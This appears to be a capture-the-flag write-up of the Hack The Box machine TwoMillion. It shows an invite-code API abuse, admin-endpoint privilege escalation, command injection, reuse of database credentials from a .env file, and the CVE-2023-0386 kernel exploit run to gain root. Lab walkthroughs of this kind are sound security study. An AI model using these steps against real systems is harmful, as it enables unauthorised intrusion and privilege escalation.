Open in app

Sign in

Write

Sign in

TwoMillion — HTB

Grishma Acharya
6 min readNov 13, 2024

--

Hack The Box

Edit description

app.hackthebox.com

TwoMillion is an easy Linux machine released on HackTheBox to celebrate reaching 2 million users. This box features an old version of the HackTheBox platform, which includes a hackable invite code. By exploiting this invite code, we gain initial access, allowing us to create an account on the platform. With our new account, we can explore various API endpoints, one of which provides a way to escalate our privileges to Administrator. As an Administrator, we can exploit a command injection vulnerability in the VPN generation endpoint to gain a system shell.

Once inside, we find an .env file containing database credentials. Thanks to password reuse, we can log in as the admin user on the machine. With further enumeration, we discover that the kernel is outdated and vulnerable to CVE-2023-0386, allowing us to achieve root privileges.

Initial Reconnaissance

Starting with an nmap scan to identify open ports and services on 10.10.11.221:

$ nmap 10.10.11.221

Output:

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Here, we see two open TCP ports: 22 (SSH) and 80 (HTTP). To dig deeper, we use an advanced nmap scan:

$ nmap -p-22,80 -A 10.10.11.221

Key Findings:

  • Port 22 (SSH): Running OpenSSH 8.9p1 on Ubuntu.
  • Port 80 (HTTP): Hosting a website on nginx, which redirects us to http://2million.htb.

Configuring Access to 2million.htb

To access the website, we add an entry in /etc/hosts:

10.10.11.221 2million.htb

Visiting http://2million.htb, we encounter an interface reminiscent of HackTheBox’s old invite code system, setting the stage for the first part of our exploit:

Here, the join section links to /invite page.

After examining the JavaScript source code, I found a file, /js/inviteapi.min.js, which included obfuscated functions. The code revealed two functions: verifyInviteCode and makeInviteCode.

By calling makeInviteCode() in the browser console and decrypting the ROT13 data using CyberChef, I uncovered a message:

“To generate the invite code, make a POST request to /api/v1/invite/generate."

Decrypting the base64 encode value in the response I got:

T8U29-HN72S-7SVLR-201BB

Verifying the Invite Code

I entered the invite code using the verifyInviteCode function, which confirmed it was valid.

After entering the invite code in the /invite page we get redirected to /register

After registration and logging in, we can see the homepage.

Visiting http://2million.htb/home/access I saw options for “connection pack” and “regenerate” directed me to /api/v1/user/vpn/generate and /api/v1/user/vpn/regeneraterespectively.

Admin API Exploration

In /api/v1, I found:

"admin":{
"GET":{
"\/api\/v1\/admin\/auth":"Check if user is admin"
},
"POST":{
"\/api\/v1\/admin\/vpn\/generate":"Generate VPN for specific user"
},
"PUT":{
"\/api\/v1\/admin\/settings\/update":"Update user settings"
}
}

Visiting /api/v1/admin/auth with GET method:

Visiting /api/v1/admin/vpn/generate with POST method:

Visiting /api/v1/admin/settings/update with PUT method:

I started making my request valid according to the responses.

Again visiting the /api/v1/admin/auth with GET method:

Also visiting /api/v1/admin/vpn/generate with POST method, we don’t get the 401 response but we can see:

{"status":"danger","message":"Invalid content type."}

Inspecting and changing the requests accordingly. I got here:

Command Injection to Gain System Access

After some investigation, I found a command injection in the username parameter:

Doing ls -la, we can see:

total 56
drwxr-xr-x 10 root root 4096 Nov 13 16:50 .
drwxr-xr-x  3 root root 4096 Jun  6  2023 ..
-rw-r--r--  1 root root   87 Jun  2  2023 .env
-rw-r--r--  1 root root 1237 Jun  2  2023 Database.php
-rw-r--r--  1 root root 2787 Jun  2  2023 Router.php
drwxr-xr-x  5 root root 4096 Nov 13 16:50 VPN
drwxr-xr-x  2 root root 4096 Jun  6  2023 assets
drwxr-xr-x  2 root root 4096 Jun  6  2023 controllers
drwxr-xr-x  5 root root 4096 Jun  6  2023 css
drwxr-xr-x  2 root root 4096 Jun  6  2023 fonts
drwxr-xr-x  2 root root 4096 Jun  6  2023 images
-rw-r--r--  1 root root 2692 Jun  2  2023 index.php
drwxr-xr-x  3 root root 4096 Jun  6  2023 js
drwxr-xr-x  2 root root 4096 Jun  6  2023 views

In the .env file I found credentials:

DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

Using these as ssh credentials:

$ sshpass -p SuperDuperPass123 ssh admin@2million.htb

I am logged in as the admin now and got the user flag:

admin@2million:~$ cat user.txt
REDACTED

Root Exploitation — CVE-2023–0386

Investigating the files, I saw:

$ cat /var/mail/admin
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

Doing uname -a, we see:

$ uname -a
Linux 2million 5.15.70-051570-generic #202209231339 SMP Fri Sep 23 13:45:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

Searching about the mentioned vulnerability, I found this:
https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/

Then I found the exploit from github:

GitHub - puckiestyle/CVE-2023-0386

Contribute to puckiestyle/CVE-2023-0386 development by creating an account on GitHub.

github.com

Then I uploaded it to 2million:

$ sshpass -p SuperDuperPass123 scp CVE-2023-0386-main.zip admin@2million.htb:/tmp/

Then I unzipped the file:

admin@2million:/tmp$ unzip CVE-2023-0386-main.zip
Archive:  CVE-2023-0386-main.zip
acc49811a9083381c28db9ec296774e6a82be419
   creating: CVE-2023-0386-main/
  inflating: CVE-2023-0386-main/Makefile  
  inflating: CVE-2023-0386-main/README.md  
  inflating: CVE-2023-0386-main/exp.c  
  inflating: CVE-2023-0386-main/fuse.c  
  inflating: CVE-2023-0386-main/getshell.c  
   creating: CVE-2023-0386-main/ovlcap/
 extracting: CVE-2023-0386-main/ovlcap/.gitkeep  
   creating: CVE-2023-0386-main/test/
  inflating: CVE-2023-0386-main/test/fuse_test.c  
  inflating: CVE-2023-0386-main/test/mnt  
  inflating: CVE-2023-0386-main/test/mnt.c

I followed the instructions in README.md: https://github.com/puckiestyle/CVE-2023-0386

And, opened two terminals with ssh connection to admin@2million.htb

Terminal 1:

$ make all
$ ./fuse ./ovlcap/lower ./gc

Terminal 2:

$ ./exp

I am the root now.

root@2million:/tmp/CVE-2023-0386-main# cat /root/root.txt 
REDACTED

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Htb Walkthrough
Htb

--

--

Grishma Acharya
Grishma Acharya

Written by Grishma Acharya

20 Followers
15 Following

CTF player | Cyber security enthusiast

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams